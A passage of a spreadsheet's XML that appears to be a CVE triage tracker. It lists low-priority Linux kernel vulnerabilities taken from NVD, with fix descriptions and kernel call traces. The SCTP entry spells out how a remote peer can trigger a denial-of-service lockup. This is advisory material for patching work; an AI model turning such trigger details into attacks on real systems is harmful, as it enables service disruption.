[10109.860657]  folio_lruvec_lock_irqsave+0x216/0x220
[10109.860661]  ? __pfx_lru_add+0x10/0x10
[10109.860665]  folio_batch_move_lru+0xc8/0x450
[10109.860670]  ? lock_acquire+0xc4/0x2d0
[10109.860674]  ? __folio_batch_add_and_move+0x60/0x2e0
[10109.860677]  ? folio_migrate_mapping+0xa6/0x110
[10109.860679]  ? folio_migrate_flags+0x13b/0x1b0
[10109.860681]  ? __pfx_lru_add+0x10/0x10
[10109.860683]  __folio_batch_add_and_move+0xe7/0x2e0
[10109.860685]  ? dma_iova_try_alloc+0xb0/0x140
[10109.860689]  folio_add_lru+0x64/0x80
[10109.860691]  __migrate_device_finalize+0x12c/0x270
[10109.860695]  migrate_device_finalize+0x10/0x20
[10109.860698]  drm_pagemap_evict_to_ram+0x185/0x370 [drm_gpusvm_helper]
[10109.860704]  ? drm_pagemap_evict_to_ram+0x96/0x370 [drm_gpusvm_helper]
[10109.860709]  xe_svm_bo_evict+0x15/0x20 [xe]
[10109.860819]  ? xe_svm_bo_evict+0x15/0x20 [xe]
[10109.860921]  xe_bo_move+0x107e/0x1570 [xe]
[10109.860992]  ? xe_ttm_tt_create+0x168/0x340 [xe]
[10109.861059]  ? __up_read+0x98/0x2b0
[10109.861061]  ? lock_is_held_type+0xa3/0x130
[10109.861067]  ttm_bo_handle_move_mem+0xe8/0x1e0 [ttm]
[10109.861075]  ttm_bo_evict+0x141/0x1c0 [ttm]
[10109.861081]  ttm_bo_evict_cb+0x9f/0x100 [ttm]
[10109.861086]  ttm_lru_walk_for_evict+0x84/0x190 [ttm]
[10109.861091]  ? xe_ttm_vram_mgr_new+0x258/0x3a0 [xe]
[10109.861198]  ttm_bo_alloc_resource+0x219/0
---truncated---</t>
        </is>
      </c>
      <c r="T727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98106</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98107</t>
        </is>
      </c>
      <c r="D728" s="5" t="inlineStr"/>
      <c r="E728" s="5" t="inlineStr"/>
      <c r="F728" s="5" t="inlineStr"/>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="inlineStr"/>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr"/>
      <c r="L728" s="5" t="inlineStr"/>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q728" s="5" t="inlineStr"/>
      <c r="R728" s="5" t="inlineStr"/>
      <c r="S728" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: fix out-of-bounds write in l2cap_ecred_connect
l2cap_chan_connect() tries to ensure there are no more than
L2CAP_ECRED_CONN_SCID_MAX pending ECRED channels, so they fit in the
same L2CAP_ECRED_CONN_REQ that l2cap_ecred_connect() constructs.
However, the check only counts deferred channels.  If 6 L2CAP sockets
are connected at the same time in order DDDDND (D=deferred,
N=non-deferred), the last can bump the total to max+1.  It results to
one __le16 written out of bounds of the scid array, and an invalid
ECRED_CONN_REQ being sent.
Fix by leaving room for the non-deferred pending ECRED channels in the
counting in l2cap_chan_connect(), so the limit can't be exceeded.
Move counting under same critical section where the channel is added.
Although race conditions involving this appear unreachable, it's easier
to see.
Also add WARN_ON_ONCE check in l2cap_ecred_defer_connect() to make this
less brittle.</t>
        </is>
      </c>
      <c r="T728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98107</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98109</t>
        </is>
      </c>
      <c r="D729" s="5" t="inlineStr"/>
      <c r="E729" s="5" t="inlineStr"/>
      <c r="F729" s="5" t="inlineStr"/>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="inlineStr"/>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr"/>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q729" s="5" t="inlineStr"/>
      <c r="R729" s="5" t="inlineStr"/>
      <c r="S729" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_core: Fix race condition during device registration
In hci_register_dev(), the power_on work item is queued to
hdev-&gt;req_workqueue before initializing hdev-&gt;adv_monitors_idr and
registering the MSFT extension via msft_register(). For devices marked with
quirks such as HCI_QUIRK_RAW_DEVICE, the HCI_UNCONFIGURED flag is set on
the device. When the power_on work item runs concurrently on another CPU,
hci_power_on() detects that the device is unconfigured and immediately
invokes hci_dev_do_close(), which calls msft_do_close().
Concurrently, msft_register() allocates the msft structure and exposes it
to hdev-&gt;msft_data prior to calling mutex_init(&amp;msft-&gt;filter_lock). If
msft_do_close() executes while hdev-&gt;msft_data is already assigned but the
mutex has not yet been initialized, mutex_lock(&amp;msft-&gt;filter_lock) operates
on an uninitialized mutex, triggering a DEBUG_LOCKS warning:
DEBUG_LOCKS_WARN_ON(lock-&gt;magic != lock)
WARNING: kernel/locking/mutex.c:625 at __mutex_lock_common
kernel/locking/mutex.c:625 [inline]
WARNING: kernel/locking/mutex.c:625 at __mutex_lock+0x12d8/0x1550
kernel/locking/mutex.c:821
...
Call Trace:
 &lt;TASK&gt;
 msft_do_close+0x308/0x7b0 net/bluetooth/msft.c:693
 hci_dev_close_sync+0x86b/0x10a0 net/bluetooth/hci_sync.c:5522
 hci_dev_do_close net/bluetooth/hci_core.c:499 [inline]
 hci_power_on+0x32c/0x750 net/bluetooth/hci_core.c:937
 process_one_work kernel/workqueue.c:3322 [inline]
 process_scheduled_works+0xa8e/0x14e0 kernel/workqueue.c:3405
 worker_thread+0x92d/0xe10 kernel/workqueue.c:3486
 kthread+0x388/0x470 kernel/kthread.c:436
 ret_from_fork+0x514/0xb70 arch/x86/kernel/process.c:158
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
 &lt;/TASK&gt;
Fix this by moving the queue_work() call in hci_register_dev() to after
idr_init(&amp;hdev-&gt;adv_monitors_idr) and msft_register(hdev) so that device
structures and extensions are fully initialized before asynchronous tasks
can access them. Additionally, assign hdev-&gt;msft_data in msft_register()
only after mutex_init(&amp;msft-&gt;filter_lock) has completed.</t>
        </is>
      </c>
      <c r="T729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98109</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98110</t>
        </is>
      </c>
      <c r="D730" s="5" t="inlineStr"/>
      <c r="E730" s="5" t="inlineStr"/>
      <c r="F730" s="5" t="inlineStr"/>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="inlineStr"/>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr"/>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q730" s="5" t="inlineStr"/>
      <c r="R730" s="5" t="inlineStr"/>
      <c r="S730" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btintel: bound firmware ID by TLV length
The firmware ID is treated as a NUL-terminated string even though the
TLV length is its only boundary. If the value does not contain a NUL
terminator, snprintf() can read beyond the received response.
Limit the conversion to the advertised TLV value length.</t>
        </is>
      </c>
      <c r="T730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98110</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98111</t>
        </is>
      </c>
      <c r="D731" s="5" t="inlineStr"/>
      <c r="E731" s="5" t="inlineStr"/>
      <c r="F731" s="5" t="inlineStr"/>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="inlineStr"/>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr"/>
      <c r="K731" s="5" t="inlineStr"/>
      <c r="L731" s="5" t="inlineStr"/>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q731" s="5" t="inlineStr"/>
      <c r="R731" s="5" t="inlineStr"/>
      <c r="S731" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btintel: validate version TLV value lengths
btintel_parse_version_tlv() verifies that a complete TLV is present in
the response, but it does not ensure that the value is long enough for
the specific TLV type. A short value can therefore cause an
out-of-bounds read through get_unaligned_le16(), get_unaligned_le32(),
or memcpy().
Reject values shorter than the minimum required by each known TLV type.
Also reject responses that do not contain the Command Complete Status
field.</t>
        </is>
      </c>
      <c r="T731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98111</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98113</t>
        </is>
      </c>
      <c r="D732" s="5" t="inlineStr"/>
      <c r="E732" s="5" t="inlineStr"/>
      <c r="F732" s="5" t="inlineStr"/>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="inlineStr"/>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K732" s="5" t="inlineStr"/>
      <c r="L732" s="5" t="inlineStr"/>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q732" s="5" t="inlineStr"/>
      <c r="R732" s="5" t="inlineStr"/>
      <c r="S732" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: rate limit unmapped SID errors
A client can include many structurally valid but unmapped SIDs in a DACL.
Logging every mapping failure lets one request generate hundreds of kernel
error messages.
Rate limit the message to prevent an authenticated client from flooding
the kernel log.</t>
        </is>
      </c>
      <c r="T732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98113</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98114</t>
        </is>
      </c>
      <c r="D733" s="5" t="inlineStr"/>
      <c r="E733" s="5" t="inlineStr"/>
      <c r="F733" s="5" t="inlineStr"/>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="inlineStr"/>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr"/>
      <c r="L733" s="5" t="inlineStr"/>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q733" s="5" t="inlineStr"/>
      <c r="R733" s="5" t="inlineStr"/>
      <c r="S733" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: propagate DACL parsing errors
parse_dacl() silently accepts truncated ACEs and allocation failures,
allowing set_info_sec() to continue with an incomplete ACL conversion.
Return parsing and allocation errors to parse_sec_desc() so malformed
security descriptors are rejected before inode attributes or ACL xattrs
are updated.</t>
        </is>
      </c>
      <c r="T733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98114</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98117</t>
        </is>
      </c>
      <c r="D734" s="5" t="inlineStr"/>
      <c r="E734" s="5" t="inlineStr"/>
      <c r="F734" s="5" t="inlineStr"/>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="inlineStr"/>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr"/>
      <c r="L734" s="5" t="inlineStr"/>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q734" s="5" t="inlineStr"/>
      <c r="R734" s="5" t="inlineStr"/>
      <c r="S734" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cachefiles: Fix potential UAF/KASAN warning
Currently, trace_cachefiles_coherency() is being passed a pointer to a
__be64 lain over the coherency data in struct cachefiles_xattr so that it
can display the first 8 bytes.  However, the data is of variable length and
could even be 0 bytes.  This could lead to a UAF or KASAN warning.
Fix this by making sure the buffer has room for at least 8 bytes and that
those 8 bytes are pre-cleared.
Further, those bytes are not 8-byte aligned, so fix the tracepoint to
extract the data as four 2-byte words (they are 2-byte aligned) and
reassemble the __be64.  The compiler will convert this into a single 8-byte
load where the CPU supports it.</t>
        </is>
      </c>
      <c r="T734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98117</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98118</t>
        </is>
      </c>
      <c r="D735" s="5" t="inlineStr"/>
      <c r="E735" s="5" t="inlineStr"/>
      <c r="F735" s="5" t="inlineStr"/>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="inlineStr"/>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K735" s="5" t="inlineStr"/>
      <c r="L735" s="5" t="inlineStr"/>
      <c r="M735" s="5" t="inlineStr"/>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q735" s="5" t="inlineStr"/>
      <c r="R735" s="5" t="inlineStr"/>
      <c r="S735" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfs: Fix readahead synchronisation issues by loading all folios upfront
There are some synchronisation issues that derive from the app thread
adding more folios to the rolling buffer whilst the collector thread is
looking at them or trying to clear them, such as determining the setting of
front_folio_order when the next folio hasn't been added yet,
The reason for the rolling buffer approach is that loading the buffer
upfront and then dropping all the refs just acquired is quite a slow
operation, and loading progressively allows some of the cost to be deferred
until after at least some of the I/O is started.
Instead, a better way is to load all the folios into the rolling buffer
upfront - and then drop the refs later, once the I/O is in progress.  (Even
better would be for the refs not to be there at all.)
Fix this by changing the rolling buffer loader to load all the folios
selected by the VM for readahead upfront into the folio queue.  The folio
queue is allocated a batch worth at a time as we don't know how many folios
are involved (the readahead_control struct, alas, has a page count, not a
folio count).
The folio refs acquired from readahead are then dropped in bulk once the
first subrequest is dispatched as it's quite a slow operation.  The
collector waits for NETFS_RREQ_NEED_PUT_RA_REFS to be cleared so that it
doesn't unlock folios before the xarray has been scanned for them.
This simplifies the buffer handling later and isn't noticeably slower as
the xarray doesn't need to be modified and the folios are all already
pre-locked.</t>
        </is>
      </c>
      <c r="T735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98118</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98119</t>
        </is>
      </c>
      <c r="D736" s="5" t="inlineStr"/>
      <c r="E736" s="5" t="inlineStr"/>
      <c r="F736" s="5" t="inlineStr"/>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="inlineStr"/>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr"/>
      <c r="L736" s="5" t="inlineStr"/>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q736" s="5" t="inlineStr"/>
      <c r="R736" s="5" t="inlineStr"/>
      <c r="S736" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfs: break unbuffered write when netfs_alloc_subrequest() fails
syzbot reported a null-ptr-deref below [1] following a fault injection in
netfs_alloc_subrequest(). [0]
When netfs_alloc_subrequest() fails, subreq is NULL.
Later, netfs_prepare_write() tries to initialize members of
subreq(e.g., source), the issue in [1] is triggered.
Let's handle the error of netfs_prepare_write() properly.
[0]
FAULT_INJECTION: forcing a failure.
name failslab, interval 1, probability 0, space 0, times 0
Call Trace:
 netfs_alloc_subrequest+0x116/0x3f0
 netfs_prepare_write+0x76/0x7b0
 netfs_unbuffered_write+0x75c/0x2020
 netfs_unbuffered_write_iter_locked+0x7d6/0xa80
 netfs_unbuffered_write_iter+0x442/0x720
 v9fs_file_write_iter+0xbf/0x100
 vfs_write+0x6ac/0x1050
[1]
KASAN: null-ptr-deref in range [0x00000000000000a8-0x00000000000000af]
RIP: 0010:netfs_prepare_write+0xbc/0x7b0 fs/netfs/write_issue.c:173
Call Trace:
 netfs_unbuffered_write+0x75c/0x2020 fs/netfs/direct_write.c:111
 netfs_unbuffered_write_iter_locked+0x7d6/0xa80 fs/netfs/direct_write.c:290
 netfs_unbuffered_write_iter+0x442/0x720 fs/netfs/direct_write.c:382
 v9fs_file_write_iter+0xbf/0x100 fs/9p/vfs_file.c:409
 new_sync_write fs/read_write.c:595 [inline]</t>
        </is>
      </c>
      <c r="T736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98119</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98120</t>
        </is>
      </c>
      <c r="D737" s="5" t="inlineStr"/>
      <c r="E737" s="5" t="inlineStr"/>
      <c r="F737" s="5" t="inlineStr"/>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="inlineStr"/>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr"/>
      <c r="L737" s="5" t="inlineStr"/>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q737" s="5" t="inlineStr"/>
      <c r="R737" s="5" t="inlineStr"/>
      <c r="S737" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfs: Fix subreq ref leak
Fix a subrequest ref leak in netfs_unbuffered_write() in the event that
subreq-&gt;io_iter ends up zero length during preparation.</t>
        </is>
      </c>
      <c r="T737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98120</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98121</t>
        </is>
      </c>
      <c r="D738" s="5" t="inlineStr"/>
      <c r="E738" s="5" t="inlineStr"/>
      <c r="F738" s="5" t="inlineStr"/>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="inlineStr"/>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr"/>
      <c r="L738" s="5" t="inlineStr"/>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q738" s="5" t="inlineStr"/>
      <c r="R738" s="5" t="inlineStr"/>
      <c r="S738" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
watchdog: msc313e: Fix NULL pointer dereference in PM callbacks
msc313e_wdt_probe() doesn't set the driver data for the platform device.
As a result, dev_get_drvdata() in msc313e_wdt_suspend() and
msc313e_wdt_resume() will return NULL, leading to a NULL pointer
dereference afterward.
Set the platform device driver data in msc313e_wdt_probe().</t>
        </is>
      </c>
      <c r="T738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98121</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98123</t>
        </is>
      </c>
      <c r="D739" s="5" t="inlineStr"/>
      <c r="E739" s="5" t="inlineStr"/>
      <c r="F739" s="5" t="inlineStr"/>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="inlineStr"/>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr"/>
      <c r="L739" s="5" t="inlineStr"/>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q739" s="5" t="inlineStr"/>
      <c r="R739" s="5" t="inlineStr"/>
      <c r="S739" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: fix soft lockup from unpadded ASCONF-ACK parameter iteration
sctp_verify_asconf() walks ASCONF-ACK parameters with
sctp_walk_params(), which advances by SCTP_PAD4(length), while the
consumer sctp_get_asconf_response() iterates the same parameters
advancing by the raw length, without padding. A single odd-length
parameter desynchronises the two walks and makes the consumer
interpret attacker-controlled bytes at a misaligned offset.
When those bytes yield a length of zero, the while loop over
asconf_ack_len makes no progress, spinning forever in softirq
context, and the watchdog reports a soft lockup. All reads stay
within the received skb, so the lockup is a pure remote denial of
service. A remote peer can trigger it with a crafted ASCONF-ACK on
an ADD-IP enabled association with an outstanding ASCONF (RFC 5061
section 4.1.2 requires the chunk to be authenticated, but the
predefined empty key id 0 allows the peer to compute the same
association HMAC from publicly exchanged parameters, so the gate
does not help).
The SCTP_PARAM_ERR_CAUSE case of sctp_verify_asconf() also performs
no length check, letting a parameter without a complete error
header reach the consumer, which reads errhdr.cause past the end of
the parameter, an out-of-bounds read.
Reject SCTP_PARAM_ERR_CAUSE parameters shorter than
sizeof(struct sctp_addip_param) + sizeof(struct sctp_errhdr) at the
verifier, and advance the consumer iterator with the same padding
rule as the verifier to keep the two walks in lockstep. The verifier
change guarantees a complete error header in every ERR_CAUSE
parameter the consumer can see, so the consumer's asconf_ack_len
check is dropped and it returns err_param-&gt;cause directly. The
consumer padding fix is still required because odd lengths remain
valid for SCTP_PARAM_ERR_CAUSE per RFC 5061.
The issue was found by ZeroHive, a vulnerability hunting agent at
Tencent Yunding Lab.</t>
        </is>
      </c>
      <c r="T739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98123</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98124</t>
        </is>
      </c>
      <c r="D740" s="5" t="inlineStr"/>
      <c r="E740" s="5" t="inlineStr"/>
      <c r="F740" s="5" t="inlineStr"/>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="inlineStr"/>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr"/>
      <c r="L740" s="5" t="inlineStr"/>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q740" s="5" t="inlineStr"/>
      <c r="R740" s="5" t="inlineStr"/>
      <c r="S740" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/client: invalidate fscache for fallocate range operations
smb3_zero_range(), smb3_punch_hole(), smb3_insert_range(), and
smb3_collapse_range() modify file contents through server-side range
operations. These operations discard the affected page cache, but leave
the FS-Cache cookie valid, so a later read may return data cached before
the range operation.
Fix this by invalidating FS-Cache after outstanding I/O has completed
and before modifying the file on the server.
Run the following as root on a CIFS mount with fsc enabled and an active
CacheFiles backend:
        bash -c '
                MNT=/mnt/cifs
                FILE="$MNT/repro"
